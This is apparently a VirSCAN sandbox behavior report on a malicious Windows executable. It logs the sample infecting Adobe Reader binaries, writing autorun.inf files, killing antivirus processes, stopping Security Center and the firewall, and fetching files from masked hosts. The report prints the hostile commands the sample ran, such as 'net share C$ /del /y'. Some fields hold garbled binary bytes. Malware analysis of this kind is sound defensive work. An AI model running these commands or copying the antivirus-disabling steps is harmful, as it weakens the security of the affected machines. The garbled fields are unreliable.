VirSCAN VirSCAN

1, You can UPLOAD any files, but there is 20Mb limit per file.
2, VirSCAN supports Rar/Zip decompression, but it must be less than 20 files.
3, Aplikace VirSCAN může skenovat komprimované soubory s heslem 'infected'nebo'virus'.

Language
Server load
Server Load

File information
Safety rating:30
Behavior list
Basic Information
MD5:11633b67e99ae82cbf8a89f9a45e1da4
file type:EXE
Production company:
version:
Shell or compiler information:COMPILER:Borland Delphi 6.0 - 7.0
Key behavior
Behavior description:修改原系统的EXE文件
details:C:\222c25ed\IE8-Setup-Full\installservices.exe
C:\install.exe
C:\Program Files\Adobe\Reader 9.0\Reader\A3DUtility.exe
C:\Program Files\Adobe\Reader 9.0\Reader\AcroBroker.exe
C:\Program Files\Adobe\Reader 9.0\Reader\AcroRd32.exe
C:\Program Files\Adobe\Reader 9.0\Reader\AcroRd32Info.exe
C:\Program Files\Adobe\Reader 9.0\Reader\AcroTextExtractor.exe
C:\Program Files\Adobe\Reader 9.0\Reader\AdobeCollabSync.exe
C:\Program Files\Adobe\Reader 9.0\Reader\Eula.exe
C:\Program Files\Adobe\Reader 9.0\Reader\LogTransport2.exe
C:\Program Files\Adobe\Reader 9.0\Reader\PDFPrevHndlrShim.exe
C:\Program Files\Adobe\Reader 9.0\Resource\Icons\SC_Reader.exe
C:\Program Files\e\e.exe
C:\Program Files\e\sdk\cpp\tools\guidgen.exe
Behavior description:获取TickCount值
details:TickCount = 216094, SleepMilliseconds = 1.
TickCount = 216110, SleepMilliseconds = 1.
TickCount = 217094, SleepMilliseconds = 1.
TickCount = 218066, SleepMilliseconds = 20.
TickCount = 219066, SleepMilliseconds = 20.
TickCount = 220066, SleepMilliseconds = 20.
TickCount = 221066, SleepMilliseconds = 20.
TickCount = 222110, SleepMilliseconds = 1.
TickCount = 222145, SleepMilliseconds = 20.
TickCount = 222254, SleepMilliseconds = 20.
TickCount = 222270, SleepMilliseconds = 20.
TickCount = 222285, SleepMilliseconds = 20.
TickCount = 222301, SleepMilliseconds = 20.
TickCount = 222316, SleepMilliseconds = 20.
TickCount = 222332, SleepMilliseconds = 20.
Behavior description:杀掉进程
details:C:\WINDOWS\system32\Mcshield.exe
C:\WINDOWS\system32\VsTskMgr.exe
C:\WINDOWS\system32\naPrdMgr.exe
C:\WINDOWS\system32\UpdaterUI.exe
C:\WINDOWS\system32\TBMon.exe
C:\WINDOWS\system32\scan32.exe
C:\WINDOWS\system32\Ravmond.exe
C:\WINDOWS\system32\CCenter.exe
C:\WINDOWS\system32\RavTask.exe
C:\WINDOWS\system32\Rav.exe
C:\WINDOWS\system32\RavMon.exe
C:\WINDOWS\system32\taskmgr.exe
Behavior description:设置特殊文件属性
details:C:\DiskX\setup.exe
C:\DiskD\setup.exe
C:\setup.exe
Behavior description:在根目录创建自运行文件
details:C:\DiskX\autorun.inf
C:\DiskD\autorun.inf
C:\autorun.inf
Behavior description:设置特殊文件夹属性
details:C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files
C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5
C:\Documents and Settings\Administrator\Local Settings\History
C:\Documents and Settings\Administrator\Local Settings\History\History.IE5
C:\Documents and Settings\Administrator\Cookies
C:\Documents and Settings\Administrator\IETldCache
Behavior description:修改注册表_启动项
details:\REGISTRY\USER\S-*\Software\Microsoft\Windows\CurrentVersion\Run\svcshare
Process behavior
Behavior description:隐藏窗口创建进程
details:ImagePath = , CmdLine = cmd.exe /c net share X$ /del /y
ImagePath = , CmdLine = C:\WINDOWS\?劺??吟祊媇魨?湱Q??$?伊?崒5橅鐲?崪溚?Q崒5??$????Q崒5橏?$??E鴭E鴥E?;E衦棆u鄫?3吟祊Ph豦垕?騮;??塇(±n?魞塇∧n?纍兝x堿p±n婬p伭锰烫烫烫烫烫烫烫?U嬱侅WVS3婦$ 纝G婽$髫髭冐?Moders!P?@? C挵x??n?d瓸A穒N硶83浌憖致夤麜AH璯+g读黖_ twere0464e3 EventTrace
ImagePath = , CmdLine = C:\WINDOWS\#type Header 0
ImagePath = , CmdLine = C:\WINDOWS\{
ImagePath = , CmdLine = C:\WINDOWS\ BufferSize, ItemULong
ImagePath = , CmdLine = C:\WINDOWS\ Version, ItemULong
ImagePath = , CmdLine = C:\WINDOWS\ BuildNumber, ItemULong
ImagePath = , CmdLine = C:\WINDOWS\ NumProc, ItemULong
ImagePath = , CmdLine = C:\WINDOWS\ EndTime, ItemULongLong
ImagePath = , CmdLine = C:\WINDOWS\ TimerResolution,ItemULong
ImagePath = , CmdLine = C:\WINDOWS\ MaxFileSize, ItemULong
ImagePath = , CmdLine = C:\WINDOWS\ LogFileMode, ItemULongX
ImagePath = , CmdLine = C:\WINDOWS\ BuffersWritten, ItemULong
ImagePath = , CmdLine = C:\WINDOWS\ StartBuffers, ItemULong
ImagePath = , CmdLine = C:\WINDOWS\ PointerSize, ItemULong
Behavior description:创建进程
details:[0x00000cc0]ImagePath = C:\WINDOWS\system32\cmd.exe, CmdLine = cmd.exe /c net share X$ /del /y
[0x00000ccc]ImagePath = C:\WINDOWS\system32\cmd.exe, CmdLine = cmd.exe /c net share D$ /del /y
[0x00000cdc]ImagePath = C:\WINDOWS\system32\cmd.exe, CmdLine = cmd.exe /c net share C$ /del /y
[0x00000ce4]ImagePath = C:\WINDOWS\system32\cmd.exe, CmdLine = cmd.exe /c net share admin$ /del /y
[0x00000cf4]ImagePath = C:\WINDOWS\system32\net.exe, CmdLine = net share X$ /del /y
[0x00000d00]ImagePath = C:\WINDOWS\system32\net1.exe, CmdLine = net1 share X$ /del /y
[0x00000d30]ImagePath = C:\WINDOWS\system32\net.exe, CmdLine = net share C$ /del /y
[0x00000d38]ImagePath = C:\WINDOWS\system32\net.exe, CmdLine = net share D$ /del /y
[0x00000d44]ImagePath = C:\WINDOWS\system32\net1.exe, CmdLine = net1 share C$ /del /y
[0x00000d4c]ImagePath = C:\WINDOWS\system32\net.exe, CmdLine = net share admin$ /del /y
[0x00000d58]ImagePath = C:\WINDOWS\system32\net1.exe, CmdLine = net1 share D$ /del /y
[0x00000d64]ImagePath = C:\WINDOWS\system32\net1.exe, CmdLine = net1 share admin$ /del /y
Behavior description:创建新文件进程
details:[0x00000a58]ImagePath = C:\WINDOWS\system32\drivers\spo0lsv.exe, CmdLine = C:\WINDOWS\system32\drivers\spo0lsv.exe
Behavior description:枚举进程
details:N/A
Behavior description:杀掉进程
details:C:\WINDOWS\system32\Mcshield.exe
C:\WINDOWS\system32\VsTskMgr.exe
C:\WINDOWS\system32\naPrdMgr.exe
C:\WINDOWS\system32\UpdaterUI.exe
C:\WINDOWS\system32\TBMon.exe
C:\WINDOWS\system32\scan32.exe
C:\WINDOWS\system32\Ravmond.exe
C:\WINDOWS\system32\CCenter.exe
C:\WINDOWS\system32\RavTask.exe
C:\WINDOWS\system32\Rav.exe
C:\WINDOWS\system32\RavMon.exe
C:\WINDOWS\system32\taskmgr.exe
Behavior description:创建本地线程
details:TargetProcess: %temp%\****.exe, InheritedFromPID = 2000, ProcessID = 2492, ThreadID = 2528, StartAddress = 77DC845A, Parameter = 00000000
TargetProcess: spo0lsv.exe, InheritedFromPID = 2492, ProcessID = 2648, ThreadID = 2656, StartAddress = 77DC845A, Parameter = 00000000
TargetProcess: spo0lsv.exe, InheritedFromPID = 2492, ProcessID = 2648, ThreadID = 2660, StartAddress = 0040A48C, Parameter = 00000000
TargetProcess: spo0lsv.exe, InheritedFromPID = 2492, ProcessID = 2648, ThreadID = 2664, StartAddress = 00403BC8, Parameter = 00CC01C8
TargetProcess: spo0lsv.exe, InheritedFromPID = 2492, ProcessID = 2648, ThreadID = 2668, StartAddress = 00403BC8, Parameter = 00CC01D4
TargetProcess: spo0lsv.exe, InheritedFromPID = 2492, ProcessID = 2648, ThreadID = 2672, StartAddress = 00403BC8, Parameter = 00CC01E0
TargetProcess: spo0lsv.exe, InheritedFromPID = 2492, ProcessID = 2648, ThreadID = 2676, StartAddress = 00403BC8, Parameter = 00CC01C8
TargetProcess: spo0lsv.exe, InheritedFromPID = 2492, ProcessID = 2648, ThreadID = 2680, StartAddress = 00403BC8, Parameter = 00CC0270
TargetProcess: spo0lsv.exe, InheritedFromPID = 2492, ProcessID = 2648, ThreadID = 2684, StartAddress = 00403BC8, Parameter = 00CC027C
TargetProcess: spo0lsv.exe, InheritedFromPID = 2492, ProcessID = 2648, ThreadID = 2688, StartAddress = 00403BC8, Parameter = 00CC0288
TargetProcess: spo0lsv.exe, InheritedFromPID = 2492, ProcessID = 2648, ThreadID = 2692, StartAddress = 00403BC8, Parameter = 00CC0294
TargetProcess: spo0lsv.exe, InheritedFromPID = 2492, ProcessID = 2648, ThreadID = 2696, StartAddress = 00403BC8, Parameter = 00CC02A0
TargetProcess: spo0lsv.exe, InheritedFromPID = 2492, ProcessID = 2648, ThreadID = 2700, StartAddress = 00403BC8, Parameter = 00CC02AC
TargetProcess: spo0lsv.exe, InheritedFromPID = 2492, ProcessID = 2648, ThreadID = 2716, StartAddress = 004061B8, Parameter = 00000000
TargetProcess: spo0lsv.exe, InheritedFromPID = 2492, ProcessID = 2648, ThreadID = 2748, StartAddress = 004061B8, Parameter = 00000000
File behavior
Behavior description:创建文件
details:C:\WINDOWS\system32\drivers\spo0lsv.exe
C:\222c25ed\Desktop_.ini
C:\222c25ed\IE8-Setup-Full\Desktop_.ini
C:\222c25ed\IE8-Setup-Full\log\Desktop_.ini
C:\DiskD\Desktop_.ini
C:\DiskX\Desktop_.ini
C:\Program Files\Desktop_.ini
C:\Program Files\Adobe\Desktop_.ini
C:\Program Files\Adobe\Reader 9.0\Desktop_.ini
C:\Program Files\Adobe\Reader 9.0\Esl\Desktop_.ini
C:\Program Files\Adobe\Reader 9.0\Reader\Desktop_.ini
C:\DiskX\setup.exe
C:\DiskD\setup.exe
C:\setup.exe
C:\Program Files\Adobe\Reader 9.0\Reader\AIR\Desktop_.ini
Behavior description:修改原系统的EXE文件
details:C:\222c25ed\IE8-Setup-Full\installservices.exe
C:\install.exe
C:\Program Files\Adobe\Reader 9.0\Reader\A3DUtility.exe
C:\Program Files\Adobe\Reader 9.0\Reader\AcroBroker.exe
C:\Program Files\Adobe\Reader 9.0\Reader\AcroRd32.exe
C:\Program Files\Adobe\Reader 9.0\Reader\AcroRd32Info.exe
C:\Program Files\Adobe\Reader 9.0\Reader\AcroTextExtractor.exe
C:\Program Files\Adobe\Reader 9.0\Reader\AdobeCollabSync.exe
C:\Program Files\Adobe\Reader 9.0\Reader\Eula.exe
C:\Program Files\Adobe\Reader 9.0\Reader\LogTransport2.exe
C:\Program Files\Adobe\Reader 9.0\Reader\PDFPrevHndlrShim.exe
C:\Program Files\Adobe\Reader 9.0\Resource\Icons\SC_Reader.exe
C:\Program Files\e\e.exe
C:\Program Files\e\sdk\cpp\tools\guidgen.exe
Behavior description:创建可执行文件
details:C:\WINDOWS\system32\drivers\spo0lsv.exe
C:\222c25ed\IE8-Setup-Full\installservices.exe
C:\install.exe
C:\Program Files\Adobe\Reader 9.0\Reader\A3DUtility.exe
C:\Program Files\Adobe\Reader 9.0\Reader\AcroBroker.exe
C:\Program Files\Adobe\Reader 9.0\Reader\AcroRd32.exe
C:\Program Files\Adobe\Reader 9.0\Reader\AcroRd32Info.exe
C:\Program Files\Adobe\Reader 9.0\Reader\AcroTextExtractor.exe
C:\Program Files\Adobe\Reader 9.0\Reader\AdobeCollabSync.exe
C:\DiskX\setup.exe
C:\DiskD\setup.exe
C:\setup.exe
C:\Program Files\Adobe\Reader 9.0\Reader\Eula.exe
C:\Program Files\Adobe\Reader 9.0\Reader\LogTransport2.exe
C:\Program Files\Adobe\Reader 9.0\Reader\PDFPrevHndlrShim.exe
Behavior description:覆盖已有文件
details:C:\222c25ed\IE8-Setup-Full\installservices.exe
C:\install.exe
C:\Program Files\Adobe\Reader 9.0\Reader\A3DUtility.exe
C:\Program Files\Adobe\Reader 9.0\Reader\AcroBroker.exe
C:\Program Files\Adobe\Reader 9.0\Reader\AcroRd32.exe
C:\Program Files\Adobe\Reader 9.0\Reader\AcroRd32Info.exe
C:\Program Files\Adobe\Reader 9.0\Reader\AcroTextExtractor.exe
C:\Program Files\Adobe\Reader 9.0\Reader\AdobeCollabSync.exe
C:\Program Files\Adobe\Reader 9.0\Reader\Eula.exe
C:\Program Files\Adobe\Reader 9.0\Reader\LogTransport2.exe
C:\Program Files\Adobe\Reader 9.0\Reader\PDFPrevHndlrShim.exe
C:\Program Files\Adobe\Reader 9.0\Resource\Icons\SC_Reader.exe
C:\Program Files\e\e.exe
C:\Program Files\e\sdk\cpp\tools\guidgen.exe
Behavior description:复制文件
details:C:\Documents and Settings\Administrator\Local Settings\%temp%\****.exe ---> C:\WINDOWS\system32\drivers\spo0lsv.exe
C:\WINDOWS\system32\drivers\spo0lsv.exe ---> C:\222c25ed\IE8-Setup-Full\installservices.exe
C:\WINDOWS\system32\drivers\spo0lsv.exe ---> C:\install.exe
C:\WINDOWS\system32\drivers\spo0lsv.exe ---> C:\Program Files\Adobe\Reader 9.0\Reader\A3DUtility.exe
C:\WINDOWS\system32\drivers\spo0lsv.exe ---> C:\Program Files\Adobe\Reader 9.0\Reader\AcroBroker.exe
C:\WINDOWS\system32\drivers\spo0lsv.exe ---> C:\Program Files\Adobe\Reader 9.0\Reader\AcroRd32.exe
C:\WINDOWS\system32\drivers\spo0lsv.exe ---> C:\Program Files\Adobe\Reader 9.0\Reader\AcroRd32Info.exe
C:\WINDOWS\system32\drivers\spo0lsv.exe ---> C:\Program Files\Adobe\Reader 9.0\Reader\AcroTextExtractor.exe
C:\WINDOWS\system32\drivers\spo0lsv.exe ---> C:\Program Files\Adobe\Reader 9.0\Reader\AdobeCollabSync.exe
C:\WINDOWS\system32\drivers\spo0lsv.exe ---> X:\setup.exe
C:\WINDOWS\system32\drivers\spo0lsv.exe ---> D:\setup.exe
C:\WINDOWS\system32\drivers\spo0lsv.exe ---> C:\setup.exe
C:\WINDOWS\system32\drivers\spo0lsv.exe ---> C:\Program Files\Adobe\Reader 9.0\Reader\Eula.exe
C:\WINDOWS\system32\drivers\spo0lsv.exe ---> C:\Program Files\Adobe\Reader 9.0\Reader\LogTransport2.exe
C:\WINDOWS\system32\drivers\spo0lsv.exe ---> C:\Program Files\Adobe\Reader 9.0\Reader\PDFPrevHndlrShim.exe
Behavior description:设置特殊文件属性
details:C:\DiskX\setup.exe
C:\DiskD\setup.exe
C:\setup.exe
Behavior description:查找文件
details:FileName = C:\Documents and Settings\Administrator\Local Settings\%temp%\Desktop_.ini
FileName = C:\WINDOWS
FileName = C:\WINDOWS\system32
FileName = C:\WINDOWS\system32\drivers
FileName = C:\WINDOWS\system32\drivers\spo0lsv.exe
FileName = C:\WINDOWS\system32\drivers\Desktop_.ini
FileName = X:\*.*
FileName = D:\*.*
FileName = C:\*.*
FileName = C:\222c25ed\Desktop_.ini
FileName = C:\222c25ed\*.*
FileName = C:\222c25ed\default.reg
FileName = C:\222c25ed\Desktop_.ini-newfile
FileName = C:\222c25ed\Desktop_.ini-samplefile
FileName = C:\222c25ed\IE8-Setup-Full\Desktop_.ini
Behavior description:在根目录创建自运行文件
details:C:\DiskX\autorun.inf
C:\DiskD\autorun.inf
C:\autorun.inf
Behavior description:设置特殊文件夹属性
details:C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files
C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5
C:\Documents and Settings\Administrator\Local Settings\History
C:\Documents and Settings\Administrator\Local Settings\History\History.IE5
C:\Documents and Settings\Administrator\Cookies
C:\Documents and Settings\Administrator\IETldCache
Behavior description:修改文件内容
details:C:\WINDOWS\system32\drivers\spo0lsv.exe ---> Offset = 0
C:\WINDOWS\system32\drivers\spo0lsv.exe ---> Offset = 65536
C:\222c25ed\Desktop_.ini ---> Offset = 0
C:\222c25ed\IE8-Setup-Full\Desktop_.ini ---> Offset = 0
C:\222c25ed\IE8-Setup-Full\installservices.exe ---> Offset = 0
C:\222c25ed\IE8-Setup-Full\installservices.exe ---> Offset = 65536
C:\222c25ed\IE8-Setup-Full\installservices.exe ---> Offset = 4096
C:\222c25ed\IE8-Setup-Full\installservices.exe ---> Offset = 8192
C:\222c25ed\IE8-Setup-Full\installservices.exe ---> Offset = 12288
C:\222c25ed\IE8-Setup-Full\installservices.exe ---> Offset = 16384
C:\222c25ed\IE8-Setup-Full\installservices.exe ---> Offset = 126976
C:\222c25ed\IE8-Setup-Full\installservices.exe ---> Offset = 127104
C:\222c25ed\IE8-Setup-Full\installservices.exe ---> Offset = 127232
C:\222c25ed\IE8-Setup-Full\installservices.exe ---> Offset = 127360
C:\222c25ed\IE8-Setup-Full\installservices.exe ---> Offset = 127488
Network behavior
Behavior description:联网打开网址
details:InternetOpenUrlA: http://ww****om, hInternet = 0x00cc0004, Flags = 0x84000002
InternetOpenUrlA: http://ww****cn/66/up.txt, hInternet = 0x00cc0004, Flags = 0x84000002
Behavior description:下载文件
details:URLDownloadToFileW: MZ?l趙飋趙焜趙Y捾w9氝w侉遷钾輜鏥踳)嗊w\庍w╩遷0斑wsals %115s +-----------------------------------------------------------------------------------------------------------------------------------+ | Disk Name Reads Kb Writes Kb %62s +-----------------------------------------------------------------------------------------------------------------------------------+ Threads Process Transaction CPU%% %22s | Launched Used KCPU(ms) UCPU(ms) KCPU(ms) UCPU(ms) %28s +-----------------------------------------------------------------------------------------------------------------------------------+ 0-% Exclusive %54s | Name PID Trans Trans/sec KCPU(ms) UCPU(ms) Process CPU%% CPU%% %20s +-----------------------------------------------------------------------------------------------------------------------------------+ ------------------------------------------------------------------+ | +-----------------------------------------------------------------------------------------------------------------------------------+ | Transaction Trans Minimum Maximum Per Transaction Total CPU%% | |
URLDownloadToFileW: #type Header 0 ---> C:\WINDOWS\#type Header 0
URLDownloadToFileW: { ---> C:\WINDOWS\{
URLDownloadToFileW: BufferSize, ItemULong ---> C:\WINDOWS\ BufferSize, ItemULong
URLDownloadToFileW: Version, ItemULong ---> C:\WINDOWS\ Version, ItemULong
URLDownloadToFileW: BuildNumber, ItemULong ---> C:\WINDOWS\ BuildNumber, ItemULong
URLDownloadToFileW: NumProc, ItemULong ---> C:\WINDOWS\ NumProc, ItemULong
URLDownloadToFileW: EndTime, ItemULongLong ---> C:\WINDOWS\ EndTime, ItemULongLong
URLDownloadToFileW: TimerResolution,ItemULong ---> C:\WINDOWS\ TimerResolution,ItemULong
URLDownloadToFileW: MaxFileSize, ItemULong ---> C:\WINDOWS\ MaxFileSize, ItemULong
URLDownloadToFileW: LogFileMode, ItemULongX ---> C:\WINDOWS\ LogFileMode, ItemULongX
URLDownloadToFileW: BuffersWritten, ItemULong ---> C:\WINDOWS\ BuffersWritten, ItemULong
URLDownloadToFileW: StartBuffers, ItemULong ---> C:\WINDOWS\ StartBuffers, ItemULong
URLDownloadToFileW: PointerSize, ItemULong ---> C:\WINDOWS\ PointerSize, ItemULong
URLDownloadToFileW: EventsLost, ItemULong ---> C:\WINDOWS\ EventsLost, ItemULong
Behavior description:连接指定站点
details:InternetConnectA: ServerName = ww****om, PORT = 80, UserName = , Password = , hSession = 0x00cc0004, hConnect = 0x00cc0008, Flags = 0x84000002
InternetConnectA: ServerName = ww****cn, PORT = 80, UserName = , Password = , hSession = 0x00cc0004, hConnect = 0x00cc0008, Flags = 0x84000002
Behavior description:打开HTTP连接
details:InternetOpenA: UserAgent: QQ, hSession = 0x00cc0004
Behavior description:建立到一个指定的套接字连接
details:URL: ww****om, IP: **.133.40.**:80, SOCKET = 0x00000338
URL: ww****om, IP: **.133.40.**:80, SOCKET = 0x0000033c
URL: ww****cn, IP: **.133.40.**:80, SOCKET = 0x00000370
URL: ww****om, IP: **.133.40.**:80, SOCKET = 0x000003b0
URL: ww****om, IP: **.133.40.**:80, SOCKET = 0x00000400
Behavior description:读取网络文件
details:hFile = 0x00cc000c, BytesToRead =1024, BytesRead = 1024.
Behavior description:发送HTTP包
details:GET / HTTP/1.1 User-Agent: QQ Host: ww****om Cache-Control: no-cache
GET /66/up.txt HTTP/1.1 User-Agent: QQ Host: ww****cn Cache-Control: no-cache
Behavior description:打开HTTP请求
details:HttpOpenRequestA: ww****cn:80/66/up.txt, hConnect = 0x00cc0008, hRequest = 0x00cc000c, Verb: GET, Referer: , Flags = 0x84000002
Behavior description:按名称获取主机地址
details:GetAddrInfoW: ww****om
GetAddrInfoW: ww****cn
Registry behavior
Behavior description:删除注册表键
details:\REGISTRY\MACHINE\SOFTWARE\Microsoft\PCHealth\ErrorReporting\DW\
Behavior description:修改注册表
details:\REGISTRY\USER\S-*\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\SavedLegacySettings
Behavior description:修改注册表_文件夹关键属性
details:\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL\CheckedValue
Behavior description:删除注册表键值
details:\REGISTRY\MACHINE\SOFTWARE\Microsoft\PCHealth\ErrorReporting\DW\DWFileTreeRoot
\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\RavTask
\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\KvMonXP
\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\kav
\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\KAVPersonal50
\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\McAfeeUpdaterUI
\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Network Associates Error Reporting Service
\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ShStatEXE
\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\YLive.exe
\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\yassistse
\REGISTRY\USER\S-*\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyServer
\REGISTRY\USER\S-*\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyOverride
\REGISTRY\USER\S-*\Software\Microsoft\Windows\CurrentVersion\Internet Settings\AutoConfigURL
Behavior description:修改注册表_启动项
details:\REGISTRY\USER\S-*\Software\Microsoft\Windows\CurrentVersion\Run\svcshare
Other behavior
Behavior description:创建互斥体
details:CTF.LBES.MutexDefaultS-*
CTF.Compart.MutexDefaultS-*
CTF.Asm.MutexDefaultS-*
CTF.Layouts.MutexDefaultS-*
CTF.TMD.MutexDefaultS-*
RasPbFile
Local\ZonesCounterMutex
Local\ZoneAttributeCacheCounterMutex
Local\ZonesCacheCounterMutex
Local\ZonesLockedCacheCounterMutex
Local\c:!documents and settings!administrator!ietldcache!
Behavior description:创建事件对象
details:EventName = Global\userenv: User Profile setup event
EventName = DINPUTWINMM
Behavior description:删除服务
details:[DeleteService] ServiceStartName: LocalSystem, DisplayName: Security Center, BinaryPathName: C:\WINDOWS\System32\svchost.exe -k netsvcs
Behavior description:修改后的可执行文件MD5
details:C:\222c25ed\IE8-Setup-Full\installservices.exe ---> eba9b7c8983baea5a59261832a8c8c08
C:\install.exe ---> c4a45819403b12091378c6ba7c9767ec
C:\Program Files\Adobe\Reader 9.0\Reader\A3DUtility.exe ---> cdf2707964c0f45d64ce5743e5d938a9
C:\Program Files\Adobe\Reader 9.0\Reader\AcroBroker.exe ---> a80b658bea3fa99b4bd6faddbe8e2181
C:\Program Files\Adobe\Reader 9.0\Reader\AcroRd32.exe ---> 6be572b3553c4e2d29905d42775a89a4
C:\Program Files\Adobe\Reader 9.0\Reader\AcroRd32Info.exe ---> 3770532b43854e7b22f7e2a450911745
C:\Program Files\Adobe\Reader 9.0\Reader\AcroTextExtractor.exe ---> f7710893cdf8684075a9e1cdf4f5ef14
C:\Program Files\Adobe\Reader 9.0\Reader\AdobeCollabSync.exe ---> 86b014bef69a320d61a7209ba42e64bd
C:\Program Files\Adobe\Reader 9.0\Reader\Eula.exe ---> a4331a05edbb2fbffb6bd5d93ae22d25
C:\Program Files\Adobe\Reader 9.0\Reader\LogTransport2.exe ---> 0704575c2c3987628f62c2d8e65813db
C:\Program Files\Adobe\Reader 9.0\Reader\PDFPrevHndlrShim.exe ---> eace363f53a9b1c45a08ba4c9cb1bffa
C:\Program Files\Adobe\Reader 9.0\Resource\Icons\SC_Reader.exe ---> 0e5e221d67bca169f298cb85fe8ce2e5
C:\Program Files\e\e.exe ---> 5fac951000c8f884177add92d067d9e3
C:\Program Files\e\sdk\cpp\tools\guidgen.exe ---> 33aa0e44c2141b7d919c04bcc8488e04
Behavior description:获取TickCount值
details:TickCount = 216094, SleepMilliseconds = 1.
TickCount = 216110, SleepMilliseconds = 1.
TickCount = 217094, SleepMilliseconds = 1.
TickCount = 218066, SleepMilliseconds = 20.
TickCount = 219066, SleepMilliseconds = 20.
TickCount = 220066, SleepMilliseconds = 20.
TickCount = 221066, SleepMilliseconds = 20.
TickCount = 222110, SleepMilliseconds = 1.
TickCount = 222145, SleepMilliseconds = 20.
TickCount = 222254, SleepMilliseconds = 20.
TickCount = 222270, SleepMilliseconds = 20.
TickCount = 222285, SleepMilliseconds = 20.
TickCount = 222301, SleepMilliseconds = 20.
TickCount = 222316, SleepMilliseconds = 20.
TickCount = 222332, SleepMilliseconds = 20.
Behavior description:调整进程token权限
details:SE_DEBUG_PRIVILEGE
Behavior description:打开事件
details:HookSwitchHookEnabledEvent
Global\SvcctrlStartEvent_A3752DX
\SECURITY\LSA_AUTHENTICATION_INITIALIZED
\INSTALLATION_SECURITY_HOLD
Behavior description:修改后的可执行文件签名信息
details:C:\222c25ed\IE8-Setup-Full\installservices.exe(签名验证: 未通过)
C:\install.exe(签名验证: 未通过)
C:\Program Files\Adobe\Reader 9.0\Reader\A3DUtility.exe(签名验证: 未通过)
C:\Program Files\Adobe\Reader 9.0\Reader\AcroBroker.exe(签名验证: 未通过)
C:\Program Files\Adobe\Reader 9.0\Reader\AcroRd32.exe(签名验证: 未通过)
C:\Program Files\Adobe\Reader 9.0\Reader\AcroRd32Info.exe(签名验证: 未通过)
C:\Program Files\Adobe\Reader 9.0\Reader\AcroTextExtractor.exe(签名验证: 未通过)
C:\Program Files\Adobe\Reader 9.0\Reader\AdobeCollabSync.exe(签名验证: 未通过)
C:\Program Files\Adobe\Reader 9.0\Reader\Eula.exe(签名验证: 未通过)
C:\Program Files\Adobe\Reader 9.0\Reader\LogTransport2.exe(签名验证: 未通过)
C:\Program Files\Adobe\Reader 9.0\Reader\PDFPrevHndlrShim.exe(签名验证: 未通过)
C:\Program Files\Adobe\Reader 9.0\Resource\Icons\SC_Reader.exe(签名验证: 未通过)
C:\Program Files\e\e.exe(签名验证: 未通过)
C:\Program Files\e\sdk\cpp\tools\guidgen.exe(签名验证: 未通过)
Behavior description:可执行文件签名信息
details:C:\WINDOWS\system32\drivers\spo0lsv.exe(签名验证: 未通过)
C:\222c25ed\IE8-Setup-Full\installservices.exe(签名验证: 未通过)
C:\install.exe(签名验证: 未通过)
C:\Program Files\Adobe\Reader 9.0\Reader\A3DUtility.exe(签名验证: 未通过)
C:\Program Files\Adobe\Reader 9.0\Reader\AcroBroker.exe(签名验证: 未通过)
C:\Program Files\Adobe\Reader 9.0\Reader\AcroRd32.exe(签名验证: 未通过)
C:\Program Files\Adobe\Reader 9.0\Reader\AcroRd32Info.exe(签名验证: 未通过)
C:\Program Files\Adobe\Reader 9.0\Reader\AcroTextExtractor.exe(签名验证: 未通过)
C:\Program Files\Adobe\Reader 9.0\Reader\AdobeCollabSync.exe(签名验证: 未通过)
C:\DiskX\setup.exe(签名验证: 未通过)
C:\DiskD\setup.exe(签名验证: 未通过)
C:\setup.exe(签名验证: 未通过)
C:\Program Files\Adobe\Reader 9.0\Reader\Eula.exe(签名验证: 未通过)
C:\Program Files\Adobe\Reader 9.0\Reader\LogTransport2.exe(签名验证: 未通过)
C:\Program Files\Adobe\Reader 9.0\Reader\PDFPrevHndlrShim.exe(签名验证: 未通过)
Behavior description:调用Sleep函数
details:[1]: MilliSeconds = 1.
[1]: MilliSeconds = 20.
[2]: MilliSeconds = 20.
[3]: MilliSeconds = 20.
[4]: MilliSeconds = 20.
[5]: MilliSeconds = 1.
[6]: MilliSeconds = 1.
[7]: MilliSeconds = 20.
[8]: MilliSeconds = 20.
[9]: MilliSeconds = 20.
[10]: MilliSeconds = 20.
Behavior description:停止系统服务
details:ServiceName = Task Scheduler
ServiceName = Windows Firewall/Internet Connection Sharing (ICS)
ServiceName = Security Center
Behavior description:可执行文件MD5
details:C:\WINDOWS\system32\drivers\spo0lsv.exe ---> 11633b67e99ae82cbf8a89f9a45e1da4
C:\222c25ed\IE8-Setup-Full\installservices.exe ---> 11633b67e99ae82cbf8a89f9a45e1da4
C:\install.exe ---> 11633b67e99ae82cbf8a89f9a45e1da4
C:\Program Files\Adobe\Reader 9.0\Reader\A3DUtility.exe ---> 11633b67e99ae82cbf8a89f9a45e1da4
C:\Program Files\Adobe\Reader 9.0\Reader\AcroBroker.exe ---> 11633b67e99ae82cbf8a89f9a45e1da4
C:\Program Files\Adobe\Reader 9.0\Reader\AcroRd32.exe ---> 11633b67e99ae82cbf8a89f9a45e1da4
C:\Program Files\Adobe\Reader 9.0\Reader\AcroRd32Info.exe ---> 11633b67e99ae82cbf8a89f9a45e1da4
C:\Program Files\Adobe\Reader 9.0\Reader\AcroTextExtractor.exe ---> 11633b67e99ae82cbf8a89f9a45e1da4
C:\Program Files\Adobe\Reader 9.0\Reader\AdobeCollabSync.exe ---> 11633b67e99ae82cbf8a89f9a45e1da4
